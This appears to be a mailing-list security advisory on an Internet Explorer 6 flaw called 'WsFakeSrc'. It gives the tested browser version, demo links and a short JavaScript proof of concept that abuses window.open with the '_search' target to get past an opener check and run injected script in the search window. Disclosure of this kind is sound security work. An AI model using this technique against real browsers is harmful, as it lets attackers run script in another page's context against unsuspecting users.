<<< Date Index >>>     <<< Thread Index >>>

MSIE->WsFakeSrc




WsFakeSrc


[tested]
Browser Ver
{ 
MS Internet Explorer: 6.0.2600.0000.xpclnt_qfe.021108-2107;
Encryption: 128-bit;
Patch:; Q810847; 
}
(So, it's far from fully patched.) 
OS Ver: "Windows XP Cn ver"

[demo]
http://www.safecenter.net/liudieyu/WsFakeSrc/WsFakeSrc-MyPage.HTM
or
http://umbrella.mx.tc 
---> WsFakeSrc section
---> WsFakeSrc-MyPage file

[exp]
window.open("javascript:[JpuScript]","_search") 
authorization checks "window.opener". 
but, [VictimWindow].open is always accessible.
so:
window.open("[VictimUrl]","_search");
[VictimIframe].open("javascript:[JpuScript]","_search");
can fool the authorization and execute [JpuScript] in
the search window.


[greetings]
the Pull, dror, guninski, sandblad and "Friedrich L.Bauer".
of course, mom and dad.

best wishes

-----
from http://Umbrella.MX.TC on http://SafeCenter.NET